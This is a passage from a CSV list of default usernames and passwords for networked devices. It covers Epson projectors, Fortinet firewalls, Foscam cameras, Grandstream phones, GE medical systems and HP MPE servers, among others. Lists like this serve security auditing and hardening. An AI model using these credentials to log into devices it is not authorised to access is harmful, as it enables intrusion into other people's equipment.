1760W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1761W,,,,0000,,,\nepson,PowerLite 1771W,,,,0000,,,\nepson,PowerLite 1776W,,,,0000,,,\nepson,PowerLite 1810p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1815p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1880,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1940W,,,EPSONWEB,admin,Admin,username in all caps - password lowercase,\nepson,PowerLite 1950,,,EPSONWEB,admin,Admin,username in all caps - password lowercase,\nepson,PowerLite 4100,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 4200W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 450,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 54c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 9 bad tries,\nepson,PowerLite 6100i,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 61p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 62c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 737c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 745c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 74c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 9 bad tries,\nepson,PowerLite 750c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 755c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 760c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 765c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 76c,,,,0000,,,\nepson,PowerLite 78,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 7800p,,,,0000,,,\nepson,PowerLite 81p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 821p,,,,0000,,,\nepson,PowerLite 822p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 825+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 825,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 826W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 82c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83V+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 84+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 84,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 85+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 85,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 905,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 95,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite D6150,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Home Cinema 700,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Presenter,,,,000000,,,\nepson,PowerLite Pro G5650W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Pro G5750WU,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Pro Z8255NL,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S3,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S4,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S6,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S9,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite W6,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite W7,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Z8000WUNL,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,VS400,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\neq3,HomeMatic,,,root,MuZhlo9n%8!G,,,\nericsson,ACC,,,netman,netman,,,\nericsson,Any router,,,netman,netman,,all,\nericsson,Ericsson ACC,,,netman,netman,,,\nericsson,Ericsson ACC,,Multi,,,Admin,,\nericsson,Ericsson Acc,,,netman,netman,,,\nericsson,NPU,3 3b 3c 3d 1d 1c,serial or telnet,cli,Eri#css$oN@2,cli,,\nericsson,Tigris Platform,All,Multi,public,,Guest,,\nericsson,W20,,,user,user,,,\nericsson,W25,,192.168.0.1 or 10.0.0.138,user,NextG,Admin,,\nericsson,W30,,192.168.1.1,,user,Admin,,\nericsson,W35,,192.168.1.1,,user,Admin,,\nericsson,md110 pabx,,up-to-bc9,,help,,,\nericsson,md110 pabx,,varies depending on config minimal list access by default,,help,,,\nericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default,,\nesesixcomputergmbh,Thintune,2.4.38-32-D,Connect port 25072,root,jstwo,Admin,,\netech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password,\netech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router,\netech,Router,v1,HTTP,,admin,Admin,,\netech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin,,\netech,rtbr03,rtbr03,Admin,admin,admin,,,\neverfocus,ECOR 8F,,,admin,11111111,,,\neverfocus,PowerPlex,,Admin,admin,admin,,,\neverfocus,PowerPlex,,Admin,operator,operator,,,\neverfocus,PowerPlex,,Admin,supervisor,supervisor,,,\neverfocus,PowerPlex,,EDR1600,admin,admin,,,\neverfocus,PowerPlex,,EDR1600,operator,operator,,,\neverfocus,PowerPlex,,EDR1600,supervisor,supervisor,,,\neverfocus,PowerPlex,EDR1600,Multi,admin,admin,Admin,,\neverfocus,PowerPlex,EDR1600,Multi,operator,operator,Admin,,\neverfocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin,,\neverfocus,edsr400,,,Admin,admin,,,\nexabyte,Mag20,,,anonymous,Exabyte,,,\nexabyte,Magnum20,,FTP,anonymous,Exabyte,Admin,,\nexacq,Technologies NVR Server,,,admin,admin256,,,\nexacq,Technologies NVR Server,,,user,user5710,,,\nexindanetworks,1700,,Default login http://172.14.1.57,admin,exinda,Admin,,\nextended systems,Firewall,,,admin,admin,,,\nextended systems,Print Server,,,admin,extendnet,,,\nextendedsystems,ExtendNet 4000 / Firewall,,,admin,admin,,all Versions,\nextendedsystems,Print Servers,,,admin,extendnet,,,\nextreme networks,All Switches,,,admin,,,,\nextreme networks,All Switches,,Admin,admin,,,,\nextreme networks,Alpine,,,admin,,,,\nextreme networks,BlackDiamond,,,admin,,,,\nextreme networks,Summit,,,admin,,,,\nextreme networks,Switches,,,admin,,,,\nextreme networks,Switches,,Admin,admin,,,,\nextreme networks,Swithces,,,admin,,,,\nextreme networks,Swithces,,Admin,admin,,,,\nextremenetworks,All Switches,,Multi,admin,,Admin,,\nextremenetworks,Alpine,,,admin,,Admin,,\nextremenetworks,BlackDiamond,,,admin,,Admin,,\nextremenetworks,Summit,,,admin,,Admin,,\nextremenetworks,Switches,,,admin,,Admin,,\nextremenetworks,Swithces,,Multi,admin,,Admin,,\nezsystems,eZ Publish,,,admin,publish,,,\nf5,Big-IP 540,,Multi,root,default,Admin,,\nf5,Big-IP,9.12,http,admin,admin,Administrator,,\nfastwire,Fastwire Bank Transfer,,,fastwire,fw,,,\nfatwire,Analytics,,,firstsite,firstsite,,,\nfatwire,Analytics,,,fwadmin,xceladmin,,,\nfirebird,FirebirdSQL,,,SYSDBA,masterkey,,,\nflowpoint,100 IDSN,,,admin,admin,,,\nflowpoint,100 IDSN,,Admin,admin,admin,,,\nflowpoint,100 IDSN,,Telnet,admin,admin,Admin,,\nflowpoint,2200 SDSL,,,admin,admin,,,\nflowpoint,2200 SDSL,,Admin,admin,admin,,,\nflowpoint,2200 SDSL,,Telnet,admin,admin,Admin,,\nflowpoint,40 IDSL,,,admin,admin,,,\nflowpoint,40 IDSL,,Admin,admin,admin,,,\nflowpoint,40 IDSL,,Telnet,admin,admin,Admin,,\nflowpoint,DSL,,,,password,,,\nflowpoint,DSL,,2000,admin,admin,,,\nflowpoint,DSL,,Admin,,password,,,\nflowpoint,DSL,,Admin,admin,admin,,,\nflowpoint,DSL,,Telnet,,password,Admin,Installed by Covad,\nflowpoint,DSL,2000,Telnet,admin,admin,Admin,,\nflowpoint,Flowpoint DSL,,,admin,admin,Admin,,\nflowpoint,Flowpoint/2000 ADSL,,,,,,,\nflowpoint,Flowpoint/2000 ADSL,,Admin,,,,,\nflowpoint,Flowpoint/2000 ADSL,,Telnet,,,Admin,,\nfortigate,Fortinet firewall,,,admin,no password,,,\nfortinet,FortiGate 300A,n/d,Multi,admin,no password,HTTP,,\nfortinet,FortiGate firewall,,Multi,admin,no password,,,\nfortinet,FortiGate,,Telnet,admin,,Admin,,\nfortinet,FortiGate,,serial console,maintainer,pbcpbn(add serial number),Admin,,\nfortinet,FortiGate-50B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiGate-60 ADSL,,192.168.1.2,admin,,Admin,,\nfortinet,FortiGate-60,,192.168.1.99 or 192.168.1.2 or 10.0.0.1 or 10.10.10.1,admin,,Admin,,\nfortinet,FortiGate-60B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiWifi-50B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiWifi-60B,,192.168.1.99,admin,,Admin,,\nfortinet,Fortigate 300A,,HTTP SSH,admin,no password,,,\nfoscam,FI8601W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8601W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8601W,H.264 Series,http,user,user,user,,\nfoscam,FI8602W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8602W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8602W,H.264 Series,http,user,user,user,,\nfoscam,FI8608W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8608W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8608W,H.264 Series,http,user,user,user,,\nfoscam,FI8620,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8620,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8620,H.264 Series,http,user,user,user,,\nfoscam,FI8904W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8905E,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8905W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8906W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8907W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8909W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8910E,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8910W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8916W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8918W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8918\\FI8918W,,,admin,,,,\nfoscam,FI8919W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI9801W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9802W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9805W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9818W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9820W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI9820W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI9820W,H.264 Series,http,user,user,user,,\nfoscam,FI9821W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI9821W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI9821W,H.264 Series,http,user,user,user,,\nfoundry networks,IronView Network Manager,,Version 01.6.00a(service pack) 0620031754,admin,admin,,,\nfoundry networks,ServerIron,,,,,,,\nfoundrynetworks,IronView Network Manager,Version 01.6.00a(service pack) 0620031754,HTTP,admin,admin,Admin,,\nfoundrynetworks,ServerIron,,,,,Admin,,\nfreenetantennas,UltraWAP-G,,192.168.2.1,admin,1234,Admin,,\nfreenetantennas,UltraWAP-N150,,192.168.2.1,admin,1234,Admin,,\nfreenetantennas,UltraWAP-N300,,192.168.2.1,admin,1234,Admin,,\nfreepbx,FreePBX,,,admin,admin,Admin,,\nfreetech,PC BIOS,,,,Posterie,,,\nfreetech,PC BIOS,,Admin,,Posterie,,,\nfreetech,PC BIOS,,Console,,Posterie,Admin,,\nfujitsusiemens,Routers,,HTTP,,connect,Admin,,\nfujixerox,DocuCentre SC2020,all versions,console,11111,x-admin,Admin,,\nfujixerox,DocuPrint 3055,2.01E+11,http://10.0.14.50,,,admin,,\nfujixerox,DocuPrint 3055,200911121222,http://10.0.14.50,,,admin,,\nfujixerox,DocuPrint C3290 FS,all versions,web interface,11111,x-admin,Admin,,\nfujixerox,Document Centre C450,,console,11111,x-admin,,,\nfujixerox,Document Centre C450,,console,11111,x-admin,,http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/,\nfunk software,Steel Belted Radius,,3.x,admin,radius,,,\nfunk software,Steel Belted Radius,,Admin,admin,radius,,,\nfunksoftware,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin,,\nfunksoftware,Steel Belted Radius,450,,admin,radius,Admin,,\ngalacticomm,Major BBS,,,Sysop,Sysop,,,\ngalacticomm,Major BBS,,Admin,Sysop,Sysop,,,\ngalacticomm,Major BBS,,Multi,Sysop,Sysop,Admin,,\ngandalf,XMUX,,,,console,,,\ngandalf,XMUX,,,,gandalf,,,\ngandalf,XMUX,,,,system,,,\ngandalf,XMUX,,,,xmux,,,\ngateway,WGR-200 Router,,,admin,admin,Admin,,\ngateway,WGR-250 Router,,,admin,admin,Admin,,\nge,Data management system,,,administrator,Never!Mind,,,\nge,Data management system,,,museadmin,Muse!Admin,,,\nge,Data management system,01/02/2003,Console,administrator,Never!Mind,,,\nge,Data management system,01/02/2003,Console,museadmin,Muse!Admin,,,\nge,Data management system,1/2/3,Console,administrator,Never!Mind,,,\nge,Data management system,1/2/3,Console,museadmin,Muse!Admin,,,\nge,Enterprise Archive,,,administrator,eaadmin,,,\nge,Enterprise Archive,02-Jan,Console,administrator,eaadmin,,,\nge,Enterprise Archive,1/2,Console,administrator,eaadmin,,,\nge,Image management system,,,administrator,gemnet,,,\nge,Image management system,01/02/2003,Console,administrator,gemnet,,,\nge,Image management system,1/2/3,Console,administrator,gemnet,,,\nge,Maclab,,,mlcltechuser,mlcl!techuser,,,\nge,Maclab,1,Console,mlcltechuser,mlcl!techuser,,,\ngeekadsl,Q31,,,admin,geekadsl,Admin,,\ngeekadsl,Q51,,,admin,geekadsl,Admin,,\ngeeklog,Geeklog,,1.3.x,username,password,,,\ngeeklog,Geeklog,1.3.x,MySQL,username,password,,,\ngeneral instruments,Cable Modem,,,test,test,,,\ngeneralinstruments,SB2100D Cable Modem,,,test,test,,,\ngericom,Phoenix,,Multi,Administrator,,Admin,,\ngesecurity,Integrated Configuration Tool,,,install,install,,,\ngiga,8ippro1000,,Multi,Administrator,admin,Admin,,\ngigabyte,GN-B49G,,,admin,admin,,,\ngigabyte,GN-B49G,,HTTP,admin,admin,,,\ngigabyte,GN-BR01G,,ip address,admin,admin,,,\nglftpd,glftpd,1.32,Other,glftpd,glftpd,ftp,,\nglobespanvirata,GS8100,,,DSL,DSL,Admin,,\nglobespanvirata,Viking,,Telnet,root,root,admin,,\nglobespanvirata,Viking,,admin,root,root,,,\nglobespanvirata,all models,all versions,http://192.168.1.1,WebAdmin,,,,\ngonet,,,,fast,abd234,,,\ngossamerthreads,dbMan,,,admin,admin,Change/Delete Data in Database,,\ngossamerthreads,dbMan,,,author,author,Change/Delete Data in Database,,\ngossamerthreads,dbMan,,,guest,guest,Change/Delete Data in Database,,\ngrandstreamnetworks,BudgeTone 100 series,,http,,admin,Admin,,\ngrandstreamnetworks,GXP-2130,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2130,,http,user,123,User,,\ngrandstreamnetworks,GXP-2135,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2135,,http,user,123,User,,\ngrandstreamnetworks,GXP-2140,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2140,,http,user,123,User,,\ngrandstreamnetworks,GXP-2160,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2160,,http,user,123,User,,\ngrandstreamnetworks,GXP-2170,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2170,,http,user,123,User,,\ngrandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,123,Config (End User),,\ngrandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,admin,Config (Advanced User),,\ngrandstreamnetworks,GXV3610,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3611,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3662,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3672,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3674,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXW4004,,,,123,User level access,,\ngrandstreamnetworks,GXW4004,,,,admin,Admin,,\ngrandstreamnetworks,GXW4008,,,,123,User level access,,\ngrandstreamnetworks,GXW4008,,,,admin,Admin,,\ngrandstreamnetworks,GXW4104,,,,123,User level access,,\ngrandstreamnetworks,GXW4104,,,,admin,Admin,,\ngrandstreamnetworks,GXW4108,,,,123,User level access,,\ngrandstreamnetworks,GXW4108,,,,admin,Admin,,\ngrandstreamnetworks,GXW4216,,http,,123,User level access,,\ngrandstreamnetworks,GXW4216,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4224,,http,,123,User level access,,\ngrandstreamnetworks,GXW4224,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4232,,http,,123,User level access,,\ngrandstreamnetworks,GXW4232,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4248,,http,,123,User level access,,\ngrandstreamnetworks,GXW4248,,http,,admin,Admin,,\ngrandstreamnetworks,HandyTone 286,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 286,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 286,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 386,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 386,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 386,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 486,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 486,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 486,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 488,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 488,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 488,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 496,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 496,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 496,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone Budgetone-100 IP Phone,,HTTP,,admin,administrator,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone-486,,,End User,123,,,\ngrandstreamnetworks,HandyTone-486,,,admin,admin,,,\ngreatspeed,DUO,,,admin,broadband,,,\ngreatspeed,DUO,,HTTP,admin,broadband,,,\nguardone,BizGuard,,,n.a,guardone,,,\nguardone,BizGuard,,multi,,guardone,Admin,,\nguardone,Restrictor,,,,guardone,,,\nguardone,Restrictor,,multi,,guardone,Admin,,\ngvc,e800/rb4,,HTTP,Administrator,admin,Admin,,\nh2o project,Medialibrary,,,admin,admin,,,\nh2oproject,Medialibrary,,HTTP,admin,admin,Admin,,\nharris,DATU,,DTMF,,1111,,,\nharris,DATU,,DTMF,,1234,,,\nharris,DATU,,DTMF,,2345,,,\nharris,DATU,,DTMF,,4300,,,\nharris,DATU,,DTMF,,7373,,,\nharris,MAU,,Modem,,4372266,,,\nharris,SASS,,DTMF,,1111,,,\nharris,SASS,,DTMF,,1122,,,\nhawlett-packard,HP Omnibook 2100,,,,,,,\nhayes,Century,,MR200,system,isp,,,\nhayes,Century,MR200,,system,isp,Admin,,\nhemoco,Lansweeper,,,lansweeperuser,mysecretpassword0*,,,\nhewlett-packard,CommandView SDM,,Secure Manager,,AUTORAID,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HPOFFICE DATA,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPONLY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPP187 SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPWORD PUB,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,LOTUS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MANAGER,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MGR,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SERVICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,FIELD.SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MANAGER.SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MGR.SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,OP.OPERATOR,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MAIL,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MPE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,REMOTE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,ITF3000,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SECURITY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TCH,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGE,VESOFT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CAROLIAN,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CCC,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CNAS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CONV,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPDESK,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPONLY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP187,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP189,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP196,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,INTX3,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ITF3000,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,NETBASE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,REGO,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,RJE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ROBELLE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SECURITY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,VESOFT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,WORD,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,XLSERVER,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,DISC,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYSTEM,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,PCUSER,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,RSBCMON,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,SPOOLMAN,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,WP,HPOFFICE,,,\nhewlett-packard,LaserJet Net Printers,,Admin,,,,,\nhewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,,,,,\nhewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,Anonymous,,,,\nhewlett-packard,LaserJet Net Printers,,User,,,,,\nhewlett-packard,LaserJet Net Printers,,User,Anonymous,,,,\nhewlett-packard,Vectra,,,,hewlpack,,,\nhewlett-packard,Vectra,,Admin,,hewlpack,,,\nhewlett-packard,Webmin,,0.84,admin,hp.com,,,\nhewlettpackard,CommandView SDM,,Multi,N/A,AUTORAID,Secure Manager,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,,,\nhewlettpackard,HP 2000/3000 